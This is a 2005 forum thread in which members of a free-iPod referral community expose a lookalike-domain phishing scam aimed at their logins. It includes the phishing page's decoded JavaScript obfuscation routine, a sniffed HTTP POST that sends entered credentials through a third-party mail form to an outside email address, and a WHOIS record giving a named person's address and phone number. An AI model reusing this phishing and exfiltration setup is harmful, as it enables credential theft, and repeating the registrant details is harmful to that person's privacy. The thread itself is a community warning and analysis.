Scammers trying to steal login ~BEWARE~
Airkat
18-11-2005 20:52:42
Got this random guy IMing me, sent me to a url, and it was freeLpod guide which might fool someone since L looks like I in a URL bar. be VERY careful people. I caught it cuz it asked me to log in and firefox always fills in my pass
[quote198701073e][2346] lilfrumpyazn Hello Are you there?
[2348] AirKat o31 sup azn
[2348] lilfrumpyazn im from freeipodguide. i was wondring if you needed any refs
[2349] lilfrumpyazn my profile
http//forum.freeipodguide.com/profile.php?mode=viewprofile&u=189
[2351] AirKat o31 lol ur funny
[2351] AirKat o31 no one is going to fall for this now since im going to let everyone know
[2352] lilfrumpyazn Yeah, I'm a dude on my sisters account.
[2352] AirKat o31 and?
[2352] AirKat o31 ur trying to send me to a fake site so I log in and u get my pass
[2352] AirKat o31 dumbass
[2352] lilfrumpyazn wanna cyber -li
[2352] lilfrumpyazn lmao[/quote198701073e]
Be ALERT!
theysayjump
18-11-2005 21:16:11
Is that the link above that you are talking about?
Airkat
18-11-2005 21:18:22
no, I edited so no one would click it... here it is with an L isntead of an I
lilili DONT LOGIN lilili
http//forum.freelpodguide.com/profile.php?mode=viewprofile&u=189
unless ofcourse freeLpodguide.com is a mirror you guys have registered
Daggoth
18-11-2005 21:19:25
its a fake link... I just talked to him. He says its http//forum.freeipodguide.com/profile.php?mode=viewprofile&u=189 but its leads to http//forum.free[bc0365538b3]l[/bc0365538b3]podguide.com/profile.php?mode=viewprofile&u=189
agroman
18-11-2005 21:21:44
that is some pretty crafty javascript. some of the code is url encoded.
Airkat
18-11-2005 21:25:21
indeed it is. and no matter where you go on that domain it takes you to that login page. Clever lil bastards. Be careful
agroman
18-11-2005 21:26:33
that first urlencoded bit is this unencoded
[code103bc86fa92]
<SCRIPT LANGUAGE="JavaScript"><!--
hp_ok=true;
function hp_d01(s){
if (!hp_ok) return;
var o="",ar=new Array(),os="",ic=0;
for(i=0;i<s.length;i++) {
c=s.charCodeAt(i);i
f(c<128)c=c^2;
os+=String.fromCharCode(c);
if(os.length>80){
ar[ic++]=os;
os=""
}
}
o=ar.join("")+os;
document.write(o)
}
//--></SCRIPT>
[/code103bc86fa92]
which probably decodes the rest of that crap.
Airkat
18-11-2005 21:27:37
they've made it confusing intentionally. Just so no one could see where it went to
agroman
18-11-2005 21:29:39
fired up the sniffer and grabbed the HTTP POST it does (using username=asdf and password=asdf) for interested parties.
[code116119eb985]
POST /cgi-bin/MailForm.exe HTTP/1.1
Host: www.safelink.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,li/li;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,li;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://forum.freelpodguide.com/profile.php?mode=viewprofile&u=189
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
username=asdf&password=asdf&login=Log+in&File=http%3A%2F%2Fforum.freeipodguide.com%2Findex.php&From=Support%40FreeiPodGuide.com&SMTP=mail.safelink.net&Subject=Login&To=3356911%40mail.com
HTTP/1.x 302 Redirect
Content-Length: 163
Content-Type: text/html
Location: http://forum.freeipodguide.com/index.php
Server: Microsoft-IIS/6.0
Date: Sat, 19 Nov 2005 05:29:22 GMT
[/code116119eb985]
agroman
18-11-2005 21:30:58
oh yeah, it looks like it's emailing the usernames and passwords to
email==3356911@mail.com3356911@mail.com=3356911@mail.com3356911@mail.com/email
agroman
18-11-2005 21:31:47
[quoteaf11b05af5="Airkat"]they've made it confusing intentionally. Just so no one could see where it went to[/quoteaf11b05af5]
as you can see, there are ways around the lengths went to cover their tracks. ;)
Airkat
18-11-2005 21:33:33
indeed there is. good work man. I couldn't be arsed to bother -D
mr_black
18-11-2005 21:53:30
wow I got a AIM from this guy asking me if i needed refs told him not
@tm watch out guys this guy is after us high TR ppl too im sure I would
have caught it tho I have my sn+pass saved too so I am never logged out.
this is by far the most creative scam yet....I am actually impressed to be truthful.
here is our convo
[quote06b0269772="AIM"]Session Start (superjuicy1lilfrumpyazn) Fri Nov 18 214333 2005
[2143] lilfrumpyazn Hello Are you there?
[2143] superjuicy1 hey
[2143] superjuicy1 who is this?
[2144] lilfrumpyazn from freeipod guide
[2144] lilfrumpyazn was wondering if you needed any refs
[2144] superjuicy1 @tm
[2144] superjuicy1 not really
[2145] lilfrumpyazn oh okay
Session Close (lilfrumpyazn) Fri Nov 18 221813 2005
[/quote06b0269772]
mr_black
18-11-2005 22:01:46
liUPDATEli
I decided to run a lil test and I just put random login crap it accepts anything.
And the more dangerous thing is it actually directs to FIPG so that makes it
that much worse cuz if some1 goes for this they wouldnt even know that thier info just got jacked.
[bd78d877f60]THERE SHOULD REALLY BE A GLOBAL THREAD ABOUT THIS TO
WARN EVERY1 CUZ NOT EVERY1 READS THIS FORUM[/bd78d877f60][/sized78d877f60]
Shroud
18-11-2005 22:03:23
just made a fake account, so if your reading this, YOU WILL NOT KNOW WHICH ONE IT WAS!
LockNLoad027
18-11-2005 22:18:17
im gay!
ilanbg
18-11-2005 22:39:15
[quote3a676aec2a="LockNLoad027"]im gay![/quote3a676aec2a]
Jacked?
LockNLoad027
18-11-2005 22:43:38
no im just realy homosexual
theysayjump
18-11-2005 23:30:04
I'm going to move this to the Trading Post as I think more people will it. I'll leave a mirror here for a while so that people know it's been moved though.
Good work guys!
dcny6923
18-11-2005 23:51:12
Im pretty gay too. are you single LockNLoad027? )
Airkat
18-11-2005 23:52:05
w00t, I got stickied
Shadow Link 721
18-11-2005 23:55:31
Airkat
18-11-2005 23:58:24
strange indeed...
dcny6923
19-11-2005 00:00:46
very strange indeed )
tvitems
19-11-2005 00:07:47
probably the same assholes that flood every ebay email address with links like those saying "VERIFY YOUR ACCOUNT WITHIN 48 HOURS OR YOU WIL BE BANNED- EBAY SECURITY" or some fake ass shit like that. Paypal too. everyone watch out for shit like that. BEWAREEEEEEEEEEEEEEEE
jfandem
19-11-2005 00:11:41
I am quite homosexual as well ). This is very strange indeed.
theysayjump
19-11-2005 00:17:08
Enough of the thread-crapping this is serious.
jfandem
19-11-2005 00:17:56
but i think your a cutie and i wanna kiss you
dcny6923
19-11-2005 00:20:04
theysayjump I want to make sweet sweet love to your grandma )
theysayjump
19-11-2005 00:21:32
Temp-ban, goodbye.
dcny6923
19-11-2005 00:22:02
I would care if this was my account! )
theysayjump
19-11-2005 00:26:19
OK, he has been IP banned. Clearly those 3 people dcny6923, jfandem and lock 'n' load had their accounts jacked so I'll change the passwords for them and e-mail them.
Twat.
Oh it was this guy btw
http//forum.freeipodguide.com/profile.php?mode=viewprofile&u=436
dcny6923
19-11-2005 00:35:16
Yeah bann that loser! P Its more than one person who is doing this you know....
theysayjump
19-11-2005 01:09:29
I didn't get the passwords changed in time but the little rascals should be gone now.
Kids roll
tvitems
19-11-2005 01:22:47
hahaha more like dooshbags....
Admin
19-11-2005 01:30:52
the forum now detects if users are redirected to the index from the phishing site and warns them to change their password in big letters. hopefully they'll get the picture.
shamash
19-11-2005 08:42:10
ROFL! He got my password. I wonder if he did anything with my account. Better change it /
The best part was, I sent it in like 3 times, cause I was like "God damnit".
Airkat
19-11-2005 08:43:01
and change the password if u use it anywhere else
compuguru
19-11-2005 08:50:35
Lol, I put in some bogus info, and it did redirect to a page that says that you need to change your password immediatley. Good work FIG!
BTW Don't you have to be registered with whois?
punjabGTRR34
19-11-2005 09:09:38
My firefox saves my pw. I don't even know my password. Just to be on the safe side, I changed my pw anyways -D
Cash4Cookies
19-11-2005 09:24:05
Damn, I was fooled, I just rolled out of bed and saw it, so I was like ok, log in. Then there was some message and I cam here and changed my password. This was the IM
VietGurl328 Hello Are you there?
VietGurl328 http//forum.freeipodguide.com/profile.php?mode=viewprofile&u=6314
VietGurl328 Hello Are you there?
Cash4Cookies05 fuck u bitch
Airkat
19-11-2005 09:33:01
no shame, it's a clever ruse
LockNLoad027
19-11-2005 11:58:43
Oh well, it was fun while it lasted.
ilanbg
19-11-2005 12:38:54
You'd think someone with something as ingenious as this would have used it to scam rather than spam. roll
Good job though FIG community. This entire dilemma was very impressive.
jfandem
19-11-2005 14:52:30
Damn, my acct got hacked into last night by the same person, vietgurl328 or whatever..........i clicked the link and it asked me to login, whoops ( anyway theysayjump THANKS so much for catching it for me and fixing it. Will this affect anything else? And i just noticed in this thread there was someone posting with my name (
johnjimjones
19-11-2005 14:55:33
meh i'm just going to change my password anyways even though i'm on this site 24/7.
compuguru
21-11-2005 05:05:09
He's got a new AIM VietGurl32
skillet2003
21-11-2005 05:37:23
yea that person just aimed me, luckily i saw this thread topic posted yesterday so I was weary enough not to login, even though I clicked the link and I didn't put in my password and login I should be good right?
slinky_
21-11-2005 13:50:47
Clever fellows.
reeemiks
22-11-2005 13:23:36
Very clever fellows indeed.....
compuguru
22-11-2005 19:41:38
WHOIS Information is now available
[code12802a11e9c]WHOIS information for freelpodguide.com:
[whois.melbourneit.com]
Domain Name.......... freelpodguide.com
Creation Date........ 2005-11-19
Registration Date.... 2005-11-19
Expiry Date.......... 2006-11-19
Organisation Name.... Graeme Norris
Organisation Address. 7 Oakhill Rd
Organisation Address.
Organisation Address. Mt Waverley
Organisation Address. 3149
Organisation Address. NY
Organisation Address. AUSTRALIA
Admin Name........... Graeme Norris
Admin Address........ 7 Oakhill Rd
Admin Address........
Admin Address........ Mt Waverley
Admin Address........ 3149
Admin Address........ NY
Admin Address........ AUSTRALIA
Admin email=.......... email=freeipodguide@ign.comfreeipodguide@ign.com.......... email=freeipodguide@ign.comfreeipodguide@ign.com/email
Admin Phone.......... +1.61416119769
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech email=........... email=domain.tech@YAHOO-INC.COMdomain.tech@YAHOO-INC.COM........... email=domain.tech@YAHOO-INC.COMdomain.tech@YAHOO-INC.COM/email
Tech Phone........... +1.6198813096
Tech Fax.............
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
[/code12802a11e9c]
LockNLoad027
25-11-2005 08:25:37
dfpntblldude is now a 2 time scammer. he tried to do a Ps3 Giftfieasta and he was like i wont go through th site. Finally i got it ut of him that they put him on hold! He scammed a guy and didnt pay him his 30.00
dfpntblldude is his AIM.. dont know his user name though
Just watch out.. hes loose
StrictlyBallin24
25-11-2005 12:33:03
Ouch (. This is why I ask people for their FIPG username and look it up myself. No link clicking involved )
theysayjump
25-11-2005 13:21:11
[quote7f2f074544="LockNLoad027"]dfpntblldude is now a 2 time scammer. he tried to do a Ps3 Giftfieasta and he was like i wont go through th site. Finally i got it ut of him that they put him on hold! He scammed a guy and didnt pay him his 30.00
dfpntblldude is his AIM.. dont know his user name though
Just watch out.. hes loose[/quote7f2f074544]
Unfortunately that AIM name doesn't match anyones on the forum. If he refused to use the forum tot rade then he is more than likely banned.
lkmwangi
25-11-2005 18:22:36
fucking hell, i knew it was only a matter of time before hackers started noticing the earning potention.